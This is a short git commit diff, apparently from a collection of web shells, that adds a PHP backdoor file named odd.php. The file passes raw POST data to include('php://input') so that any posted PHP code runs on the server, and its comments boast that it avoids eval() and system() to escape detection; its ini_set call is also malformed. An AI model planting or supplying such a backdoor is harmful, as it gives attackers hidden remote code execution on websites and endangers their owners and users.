update

php shell and jsp shell
2025-12-09 22:21:31 +00:00 · 2013-09-13 10:44:57 +08:00
parent 5ba51580de
commit df6d55ad4f
29 changed files with 7756 additions and 0 deletions
--- a/php/phpkit-0.2a/odd.php
+++ b/php/phpkit-0.2a/odd.php
@@ -0,0 +1,10 @@
+// php://input based backdoor
+// uses include('php://input') to execute arbritary code
+// Any valid PHP code sent as raw POST data to backdoor is ran
+// overrides the php.ini settings using ini_set :)
+// Insecurety Research 2013 | insecurety.net
+<?php
+ini_set('allow_url_include, 1'); // Allow url inclusion in this script
+// No eval() calls, no system() calls, nothing normally seen as malicious.
+include('php://input');
+?>